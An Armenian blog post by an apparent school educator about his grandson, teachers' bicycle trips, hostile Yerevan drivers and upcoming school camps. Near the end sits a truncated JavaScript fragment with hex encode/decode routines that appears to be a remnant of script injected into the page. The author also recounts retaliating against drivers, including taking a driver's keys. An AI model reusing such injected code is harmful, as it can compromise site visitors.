Դավիթ Բլեյանի հետ նորից կռվել էինք, չէինք խոսում-հանդիպում… Երեկ առավոտյան Մարմարյա սրահում, ընդհանուր պարապմունքին հանդիպեցինք. մենք ընտանիքով երգում էինք Կոմիտաս, Դավիթը՝ պառկած աստիճաններին, ոտքը՝ ոտքին… Զանգվածից կարողանում է առանձնանալ, զանգվածային գործողության չի տրվում… Իրիկունը ութին, երբ հեծանվով տուն մտա, սպասում է դռան մոտ, պատրաստվել է հատուկ դիմավորել ինձ. խոհանոցի սեղանի շուրջ ես ուտում եմ, ինքը խոսում է, ինձ զբաղեցնում է, իմ սիրտն առնում… Երկար նստեցինք տան տղամարդիկով, սոված էի…
— Դավիթ, իսկ Ադրիանայից ինչո՞ւ չես պատմում…
— Չէր եկել, պա՛պ, այսօր, ի՜նչ պատմեմ…
— Բա ինչո՞ւ չէր եկել…
— Ի՜նչ իմանամ, պա՛պ…
— Ո՞նց,- զարմանում եմ,- ընկերուհիդ չի եկել, դաստիարակի միջոցով պարզի…
— Ամաչում եմ, պապ… Հեսա մեծանում եմ արդեն… Բջջային հեռախոս կունենամ, կզանգեմ, էլ չի բացակայի, միշտ ինձ հետ կլինի…
Երկար տղայիցդ խռով մնալ չի կարելի, տես՝ ինչպես է հասունանում. կարևոր շրջաններ-փուլեր կարող ես բաց թողնել…
— Դավիթ, մարմարյա սրահում առավոտյան ինչո՞ւ չէիր երգում, բոլորը երգում էին… իսկ դու՝ պառկած…
— Լսում էի պապ, բոլորը երգում էին՝ ես լսում էի… Հոգնած էի պապ, պառկած էի լսում, համ էլ ինձ բոլորը չէին տեսնում, ես լսում էի… Իմ սիրած երգերն էին երգում…
— Լա՞վ էին երգում, Դավիթ, լսվո՞ւմ էր պառկած…
Հանկարծ ոգևորվում է «Աշոտիկը», աթոռին կանգնում.
— Թող բարձր երգեն, բոլոր-բոլորը գան հավաքվեն ու բարձր, շատ բարձր,- ցույց է տալիս,- երգեն «Արև,արև»-ն ու «Կաքավիկը»

Լողում են Նոր դպրոցի 6 տարեկանները:
Լուսանկարները՝ Մերի Գրիգորյանի:

Արմինե Թոփչյանին, Գայանե Գրիգորյանին, Կարինե Բաբուջյանին, Տաթև Համբարյանին ու Տաթև Աթոյանին սիրով շնորհավորում եմ. կեցցե՛ք աղջիկներ, հեծանվախմբով այսպիսի ինքնուրույն-խիզախ թռիչքի համար… Իսկական թռիչք է, Բանգլադեշից, Իսակովի պողոտայով մինչև Օպերա-Կասկադ ու վերադարձ… Արմինեն ու Բաբուջը ծիծաղով պատմում են մանրամասներ, ու ես հաճույքով լսում եմ… Վարորդները Երևանի, մեծ թվերի մեջ, անբարյացակամ են, չընդառաջող, հաճախ՝ նաև ագրեսիվ… որքա՜ն տգեղ՝ իրենց ամբարտավանության մեջ… Լավ, հասկացանք, որ խնդիրներ ունեք տունը-աշխատանքի մեջ-պետական կյանքում, բայց ինչո՛ւ եք մեր՝ ազգային փոքրամասնություն հեծանվորդներիս վրա եք ջարդում, մեզ տեսնելիս իշխանության նման ձեզ պահում՝ ճնշեք, որ ձեր թերարժեքությունը հաղթահարա՞ծ զգաք… Ափսո՜ս… Իսկ ես ամբարտավաններին չեմ զիջում, սկսել եմ պատժել յուրաքանչյուր այդպիսի դրսևորման համար… հենց այսպես՝ քշում-հասնում եմ, բռնացնում ամբարտավանին-անբարյացակամ-չզիջողին ու մեքենայի մեջ կամ իջնել տալով ծանոթ բառերով ասում՝ ինչ եմ մտածում… Մի անգամ մեքենայի դողն էի ծակելու… դե, ոստիկան չեմ, որ տալոնը ծակեմ… Մի անգամ էլ բանալիները վերցրի… Դե, գնա, չեմ տալիս… Հեծանվորդը կարող է և սխալվել. մենք քիչ ենք երկանիվներով, անպաշտպան, դուք շատ եք չորսանիվներով, պաշտպանված… Պիտի զիջեք-ընդառաջեք, ներողամիտ ուղղեք-սովորեցնեք-ներառեք մեզ երթևեկության մեջ… Մայթերը մերը չեն, ընկերներ, դրանք հետիոտնինն են, իսկ հետիոտների մեջ երեխաներ են, ծոցվոր կանայք, հաճախ՝ ծերունիներ, անկանխատեսելի խմբեր-շարժումներ… Մայթերը սայլակավորների համար են ու հաճախ անհարմար, հեծանվի համար շատ դեպքերում՝ դրանք չկան… Մենք գալիս ենք ճանապարհով մեր…

«Սուտլիկ որսկանը» Նոր դպրոցի թատերասրահում:
Լուսանկարները՝ Արմինե Մնացականյանի:

Հունիսի 10-ին՝ մեր հանրակրթական ճամբարների վերջին օրը, կրթահամալիրի Ավագ դպրոցի շրջանավարտները կմիանան ժամը 9.00-ին սկսվող ռազմամարզական խաղերին, ինչպես և 4-րդցիները, հետո՝ նաև Մարմարյա սրահի 9.30-ի տողանին հանդիսավոր… Տեսնենք նրանց ինքնակազմակերպման, համերաշխության-ներառման աստիճանի դրսևորումը, աջակցենք. շրջանավարտներն էլ ոչ շրջանավարտների համեմատ են քիչ, խոցելի, մեր աջակցության կարիքն ունեն…

Հիմնական դպրոցի լողափին:
Լուսանկարները՝ Սրբուհի Ներսիսյանի:

Իսկ հունիսի 13-ից սկսվողը մեր լրացուցիչ կրթության ճամբարային կյանքի մեկնարկն է. 2-ից 5 տարեկանների և 6-10 տարեկանների լողափային ճամբար, բանգլադեշյան պլեների ստեղծագործական ճամբար՝ ուսուցիչների և սովորողների, մանկավարժության ճամբար, ավագ դպրոցի մուտքի ճամբար 9-րդցիների համար, հրեն Գնելի ու Հերմինեի՝ պատանիների ծրագրավորման ճամբար… Ճամբար՝ երևանյան թե արտագնա բաղադրիչներով, ճամբարականի հավեսով ու իրական ճամբարային կյանքի կազմակերպմամբ: Համեցե՛ք:

Ֆոտոխմբագիր՝ Անահիտ Հարությունյան
# 695

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Առյուծն ի՞նչ է, իմա՞լ առյուծ…

«Օտարումն ի՞նչ է». հարցրեց Դավիթ Բլեյանը օրեր առաջ, երբ հանդիպեց բառին: «Առյուծն ի՞նչ է, իմա՞լ առյուծ. հեռվեն կուտի՞, թե՝ մոտենաս ու նոր կուտի… ». այսպես ու այդ պահին արտաբերեցի Դավթի

Օձը որքան գեղեցիկն ըլնի, վարդի՞ն սիրական չի լինի․..

Մարդո՛ւ կորուստը կորուստներից ամենամեծը, ամենաողբերգականն է… Այստեղից էլ տենդագին փնտրտուքը մարդու, նրա հայտնաբերման ուրախությունը ու թողած տպավորությունը՝ անջնջելի… Մի սիրուն Աղասի Քանաքեռի կորած տներում որ տեսավ Խաչատուրը մեր ո՜նց գրականություն-լեզու բերեց

Դաստիարակը պետք է կարողանա…

Մնացածը՝ Նելի Արղությանի ֆեյսբուքյան էջում, սենսեյ Հայկուհու և սեբաստացի կարող դաստիարակների բահով պարը Նելի Արղությանի սցենարով բեմադրության այս ֆիլմով դիտեք… Վերջ. 2019-ի հունիսյան բանգլադեշյան պլեների մի ուղղությունը հեղինակային TV-ների փառատոնն